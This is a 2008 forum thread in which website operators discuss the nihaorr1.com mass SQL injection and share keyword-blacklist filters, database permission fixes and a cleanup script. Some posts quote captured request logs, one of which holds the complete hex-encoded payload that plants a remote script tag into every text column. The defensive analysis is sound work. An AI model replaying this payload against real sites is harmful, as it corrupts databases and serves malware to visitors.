
Thread: Anyone know about www.nihaorr1.com/1.js?

Last post 08-26-2008 12:21 AM by silkyfixer. 108 replies.


  • 04-26-2008, 12:28 PM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 2:00 PM
    • London, UK
    • Posts 749

    Re: Anyone know about www.nihaorr1.com/1.js?

     Steve, if they were encoded in hex

       DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300
       4C00410052004500200040005400200076006100720063006800610072
       00280032003500350029002C0040004300200076006100720063006800
       610072002800320035003500290020004400450043004C004100520045
       0020005400610062006C0065005F00430075.........

    etc 

    wouldn't we have to search for something like that?

     

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-26-2008, 1:30 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    The example I provided searches for text in the cs-uri-query IIS log file for the wildcard %CAST%, the percent signs are wild cards on both sides.  People can change the text to be %DECLARE% or variations.  I chose CAST because that seemed to be a common term.

    Steve Schofield
    Windows Server MVP - IIS
    http://weblogs.asp.net/steveschofield

    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget
  • 04-26-2008, 9:16 PM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 2:00 PM
    • London, UK
    • Posts 749

    Re: Anyone know about www.nihaorr1.com/1.js?

    I see. CAST is a common term and is used in this attack. I believe another similar command, CONVERT, can be used instead as they have similar functionality.

    So, I believe, it does not have to be CAST.

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-26-2008, 9:43 PM In reply to

    • Rovastar
    • Top 10 Contributor
    • Joined on 03-13-2008, 2:00 PM
    • London, UK
    • Posts 749

    Re: Anyone know about www.nihaorr1.com/1.js?

    Also, for those of you who want a more detailed explanation of the deeper goings-on of this attack.

    See this article. Interesting stuff.

    http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html

    and here is more on the attack

    http://isc.sans.org/diary.html?storyid=4331 

    http://www.dynamoo.com/blog/2008/04/nihaorr1com-theres-no-such-thing-as.html

     

    Most overused word in IT is 'should' as in 'That should work!?!'
  • 04-26-2008, 10:53 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Hi,

     The use of this script pointing to nihaorr1.com is only the latest method of attack used by this attacker.  This guy has been hacking at a client's web site for a long time and usually does so through various proxy servers.  For those looking for a tool to view IIS log files, check out this program I have written: http://www.alexanderhiggins.com/logfileparser.aspx

    To prevent the attacks I have done the following:

    1) Open notepad and paste the following code.  The code will check the request for a SQL injection attack, and if it finds one it sends you an email and redirects the request to an error page.

    <%
    ' urlfilter.asp - checks the query string against a keyword blacklist;
    ' on a match it emails the request details and redirects to an error page.
    dim str
    dim r
    dim badwords
    dim i
    str = request.servervariables("QUERY_STRING")

    ' ?preview=true shows the email body in the browser instead of sending it
    if verify(str) = false or (request.querystring("preview")="true") then
     Set myMail=CreateObject("CDO.Message")
     myMail.Subject="Sending email with CDO"
     myMail.From="youremailaddress@yourdomain.com"
     myMail.To="youremailaddress@yourdomain.com"

     ' dump every server variable (headers, query string, client address) into the mail
     Dim body
     for each item in request.servervariables
      body = body & item & "=" & request.servervariables(item) & vbcrlf
     next
     'for each item in request.params
      'body = body & item & "=" & request.params(item) & vbcrlf
     'next
     myMail.TextBody="This is a SQL Injection Hack Attempt.  Heres the details.  " & vbcrlf & vbcrlf & body
     if request.querystring("preview")="true" then
      response.write("<pre>" & myMail.textbody & "</pre>")
      set myMail=nothing
     else
      myMail.Send
      set myMail=nothing
      response.redirect("urlscripterror.asp")
     end if
    end if
      'response.write(verify(str) &"<BR>")
      'response.write(str &"<BR>")
      'response.write(request.servervariables.count)
      'for each item in request.servervariables
      'response.write(item & "=" & request.servervariables(item) & "<BR>")
      'next

    function verify(s)

     'convert the querystring to lowercase
     s = lcase(s)

     ' badwords - a list of disallowed keywords in the url
     badwords= "select insert update delete drop -- table alter cast convert exec chr( union"

     ' create an array of each bad word
     r = split(badwords, " ")

     ' loop through the bad words and return false if one is present.
     ' instr is a substring match, so "cast" also matches e.g. "broadcast".
     for i =0 to ubound(r)
      if instr(s, r(i)) > 0 then
       verify = false 'instr(s, r(i))
       exit function
      end if
     next

     ' If no bad word was found then set verify to True
     verify=true

    end function
    %>

     

    2) Save the file as urlfilter.asp and upload it to your web site root.

    3) Include the file by pasting the following code at the very beginning of your asp pages. Note if your site uses includes you can include it in a single include that is shared by all of your pages.

    <!-- #include virtual="/urlfilter.asp" -->

    From a security perspective, lock down your databases.  Perhaps allow only select permissions for anonymous viewers and have a different sql login and connection string for the backend where database updates are required.

    My issue with monitoring for EXEC commands is by that point the damage is already done. Further, if the hacker is skilled enough they can compromise your entire server before you even realize they have attacked using the right SQL code.

    Here is the email I received when this attack happened, with certain information replaced of course.

    This is a SQL Injection Hack Attempt.  Heres the details. 

     

    ALL_HTTP=HTTP_CONNECTION:keep-alive
    HTTP_CONTENT_LENGTH:0
    HTTP_CONTENT_TYPE:text/html
    HTTP_ACCEPT:text/html, */*
    HTTP_HOST:www.domainname.com
    HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)

    ALL_RAW=Connection: keep-alive
    Content-Length: 0
    Content-Type: text/html
    Accept: text/html, */*
    Host: www.domainname.com
    User-Agent: Mozilla/3.0 (compatible; Indy Library)

    APPL_MD_PATH=/LM/W3SVC/1206399212/Root
    APPL_PHYSICAL_PATH=E:\domainname\web\
    AUTH_PASSWORD=
    AUTH_TYPE=
    AUTH_USER=
    CERT_COOKIE=
    CERT_FLAGS=
    CERT_ISSUER=
    CERT_KEYSIZE=
    CERT_SECRETKEYSIZE=
    CERT_SERIALNUMBER=
    CERT_SERVER_ISSUER=
    CERT_SERVER_SUBJECT=
    CERT_SUBJECT=
    CONTENT_LENGTH=0
    CONTENT_TYPE=text/html
    GATEWAY_INTERFACE=CGI/1.1
    HTTPS=off
    HTTPS_KEYSIZE=
    HTTPS_SECRETKEYSIZE=
    HTTPS_SERVER_ISSUER=
    HTTPS_SERVER_SUBJECT=
    INSTANCE_ID=1206399212
    INSTANCE_META_PATH=/LM/W3SVC/1206399212
    LOCAL_ADDR=xxx.xxx.xxx.xxx
    LOGON_USER=
    PATH_INFO=/attackedpage.asp
    PATH_TRANSLATED=E:\domainname\web\attackedpage.asp
    QUERY_STRING=date=4/17/2008%2011:05:00%20AM';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004
C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    REMOTE_ADDR=219.153.46.28
    REMOTE_HOST=219.153.46.28
    REMOTE_USER=
    REQUEST_METHOD=POST
    SCRIPT_NAME=/lakewood_blueclaws_schedule.asp
    SERVER_NAME=www.domainname.com
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.0
    SERVER_SOFTWARE=Microsoft-IIS/6.0
    URL=/attackedpage.asp
    HTTP_CONNECTION=keep-alive
    HTTP_CONTENT_LENGTH=0
    HTTP_CONTENT_TYPE=text/html
    HTTP_ACCEPT=text/html, */*
    HTTP_HOST=www.domainname.com
    HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library)

    As you can see the attacker simply sent a malformed URL query, which of course is viewable in my IIS logs.

  • 04-27-2008, 3:03 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    I want to preface this comment with the following: I have very minimal experience with IIS and MS SQL. I do, however, have experience with MySQL. This post is not meant as flamebait.

    racekites:

    ...

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    ...

    Unless you are dealing with a database where you know what every single value is going to be, won't this result in false positives? For example, if a user enters a value of "b0x", this will match the "0x" in the list of bad words. Additionally, aren't there many ways to bypass a blacklist such as this (CAST, etc.)?

    Doesn't MS SQL Server have a method to escape certain characters? When I create a program that uses a MySQL database, I have two functions - EscapeMySQL and UnEscapeMySQL. When I have data from a user, it passes through EscapeMySQL before being stored in the database. When I read a value from the database, it passes through UnEscapeMySQL before being displayed. By escaping certain characters (backslash, quote, double quote, linefeed, carriage return, tab, etc.), I don't have to worry even if "DROP DATABASE" is in a string.

    --
    Dave

  • 04-27-2008, 5:22 PM In reply to

    • fox1977
    • Top 500 Contributor
    • Joined on 07-18-2007, 7:37 PM
    • Posts 12

    Re: Anyone know about www.nihaorr1.com/1.js?

    Hi folks,

    Just a quick question, apologies if it sounds a bit stupid.  Are there any Microsoft patches available to prevent this happening (either on SQL or IIS) or should any protective measures be taken at the application level?

    I've just spent the weekend patching web servers anyway!

    Thanks
     

  • 04-27-2008, 6:19 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Yes, these will send up some false positives.

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    That's why in my post I have limited the blacklisted words to

     badwords= "select insert update delete drop -- table alter cast convert exec chr( union"

     Or

    passedString(0)= "select"
    passedString(1)= "insert"
    passedString(2)= "update"
    passedString(3)= "delete"
    passedString(4)= "drop"
    passedString(5)= "--"
    passedString(6)= "table"
    passedString(7)= "alter"
    passedString(8)= "cast"
    passedString(9)= "convert"
    passedString(10)= "exec"
    passedString(11) = "chr("
    passedString(12) = "union"

    Additionally, once a request is filtered, I receive an email so I can review and check for a false positive and adjust my code accordingly.

    As far as MS SQL having a function to prevent this, they do, and it's called stored procedures.  The problem is that most old school ASP programming uses free text queries, which the hackers are taking advantage of here.  If the code were to use stored procedures this wouldn't be an issue.

  • 04-28-2008, 2:04 AM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks for all the info here guys, we were hit last week and this thread saved me a lot of time.

     On the subject of stored procs, I'm not sure that they will automatically solve the problem. I have one simple stored proc called from a form that could still provide a vehicle for executing the malicious code, validating the query or the individual parameters would still appear to be the best thing to do.

     

  • 04-28-2008, 4:17 PM In reply to

    • naziml
    • Top 150 Contributor
    • Joined on 03-10-2008, 6:25 PM
    • Posts 21

    Re: Anyone know about www.nihaorr1.com/1.js?

    I have put up a generic ASP SQL validation script on my blog post here.

    Hope this helps.

    ------------------------------------------------------ 

    Nazim

    IIS Security

  • 05-03-2008, 6:09 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    How would stored procedures be vulnerable?  The parameters are converted to a string and are not executed as T-SQL.  Try it out, I think you are confused.

  • 05-07-2008, 4:21 AM In reply to

    • bjornen
    • Not Ranked
    • Joined on 05-07-2008, 8:08 AM
    • Posts 2

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks a lot alexhiggins732 

    I added this script to the website and it seems to work very well already. Only a few hours after I set it up, he tried again. This time he was not able to destroy any data in the database. I got the email with the below information. Is there at all anything that can be done to pursue this guy?

    ALL_HTTP=HTTP_ACCEPT:text/html, */*
    HTTP_CONNECTION:keep-alive
    HTTP_HOST:www.mydomain.com
    HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)
    HTTP_CONTENT_LENGTH:0
    HTTP_CONTENT_TYPE:text/html

    ALL_RAW=Accept: text/html, */*
    Connection: keep-alive
    Host: www.mydomain.com
    User-Agent: Mozilla/3.0 (compatible; Indy Library)
    Content-Length: 0
    Content-Type: text/html

    APPL_MD_PATH=/LM/W3SVC/24/Root
    APPL_PHYSICAL_PATH=E:\www\site\
    AUTH_PASSWORD=
    AUTH_TYPE=
    AUTH_USER=
    CERT_COOKIE=
    CERT_FLAGS=
    CERT_ISSUER=
    CERT_KEYSIZE=
    CERT_SECRETKEYSIZE=
    CERT_SERIALNUMBER=
    CERT_SERVER_ISSUER=
    CERT_SERVER_SUBJECT=
    CERT_SUBJECT=
    CONTENT_LENGTH=0
    CONTENT_TYPE=text/html
    GATEWAY_INTERFACE=CGI/1.1
    HTTPS=off
    HTTPS_KEYSIZE=
    HTTPS_SECRETKEYSIZE=
    HTTPS_SERVER_ISSUER=
    HTTPS_SERVER_SUBJECT=
    INSTANCE_ID=24
    INSTANCE_META_PATH=/LM/W3SVC/24
    LOCAL_ADDR=0.0.0.0
    LOGON_USER=
    PATH_INFO=/default.asp
    PATH_TRANSLATED=E:\www\file\default.asp
    QUERY_STRING=Folder=469&CompanyDirectory=1440&CompanyName=Bon+Bon+Guesthouse';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(...
    REMOTE_ADDR=60.169.3.130
    REMOTE_HOST=60.169.3.130
    REMOTE_USER=
    REQUEST_METHOD=POST
    SCRIPT_NAME=/default.asp
    SERVER_NAME=www.mydomain.com
    SERVER_PORT=80
    SERVER_PORT_SECURE=0
    SERVER_PROTOCOL=HTTP/1.0
    SERVER_SOFTWARE=Microsoft-IIS/5.0
    URL=/default.asp
    HTTP_ACCEPT=text/html, */*
    HTTP_CONNECTION=keep-alive
    HTTP_HOST=www.mydomain.com
    HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library)
    HTTP_CONTENT_LENGTH=0
    HTTP_CONTENT_TYPE=text/html

  • 05-07-2008, 4:37 AM In reply to

    • bjornen
    • Not Ranked
    • Joined on 05-07-2008, 8:08 AM
    • Posts 2

    Re: Anyone know about www.nihaorr1.com/1.js?

    By the way. I see he seems to be from China, but I assume this is not his real IP.

    IP: 60.169.3.130
    Country: CHINA
    Region: -
    City: -
    Isp: CHINANET ANHUI PROVINCE NETWORK

  • 05-07-2008, 5:25 PM In reply to

    Re: Anyone know about www.nihaorr1.com/1.js?

    Thanks for posting this. It did help. I just wanted to contribute also to the group. We got SQL injected last night by this and this is how I fixed it.

    1) First to prevent script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments to sql_login_of_your_app
    deny select on syscolumns to sql_login_of_your_app
    deny select on systypes to sql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum).


    2) Use what the hacker used.

    select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    That query tells you what was infected.
    With a night without sleep and a few hours later, here is the script that will go through all the tables / columns and remove that string.

    Hope this helps. Don't hesitate if you have questions.
    Thanks




    Use DBname --- (your actual DB infected)
    go

    -- (if needed) drop table tmp_tableInfected
    create table tmp_tableInfected
          (t varchar(100),
           c varchar(100),
           total int)

    -- (if needed) truncate table tmp_tableInfected

    Declare @sqlInjectString varchar(200)

    --- here you specify the sql inject string. They used 2 different ones in our case
    Set @sqlInjectString = '<script src=http://www.nihaorr1.com/1.js></script>'

    DECLARE @T varchar(255),
    @C varchar(255)

    set nocount on

    -- same catalog query the injected script ran: every text/ntext/varchar/nvarchar
    -- column (xtype 99, 35, 167, 231) of every user table, minus tables excluded by name
    DECLARE Table_Cursor
    CURSOR FOR
    select a.name,
    b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    and a.name not in ('t_article', 'tbl_reviews', 'tbl_articles', 'tbl_reviews_BK','tbl_spotlights_BK')
    order by a.name, b.name

    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor
    INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN

          --print ('insert into tmp_tableInfected select '''
          --+  @T +  ''','''
          --+  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          --+ @C  + '] LIKE ''%'
          --+ @sqlInjectString + '%'' having count(*) > 0')

          -- record every column that still contains the injected string
          Exec ('insert into tmp_tableInfected select '''
          +  @T +  ''','''
          +  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          + @C  + '] LIKE ''%'
          + @sqlInjectString + '%'' having count(*) > 0')

    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END
    CLOSE Table_Cursor
    DEALLOCATE Table_Cursor

    --DECLARE @T varchar(255),
    --@C varchar(255)

    -- second pass: print (and, once reviewed, exec) one UPDATE per infected column.
    -- REPLACE does not accept a text/ntext column (xtype 35/99) directly; those
    -- updates need the column converted to varchar/nvarchar first.
    DECLARE fixSQLInject_Cursor
    CURSOR FOR
    select t,c from tmp_tableInfected

    OPEN fixSQLInject_Cursor
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN

          Print 'update [' + @t + '] set [' + @c + '] = replace([' + @c + '],''' + @sqlInjectString + ''', '''')'
          --- exec ('update [' + @t + '] set [' + @c + '] = replace([' + @c + '],''' + @sqlInjectString + ''', '''')')

    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    END
    CLOSE fixSQLInject_Cursor
    DEALLOCATE fixSQLInject_Cursor

    --select t,c,total from tmp_tableInfected

    drop table tmp_tableInfected


    powlette:

    Long story short, it's definitely SQL injection. Here's the offending url:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x...

    Decoding that binary data, which is cast to a varchar, yields this:

    DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('up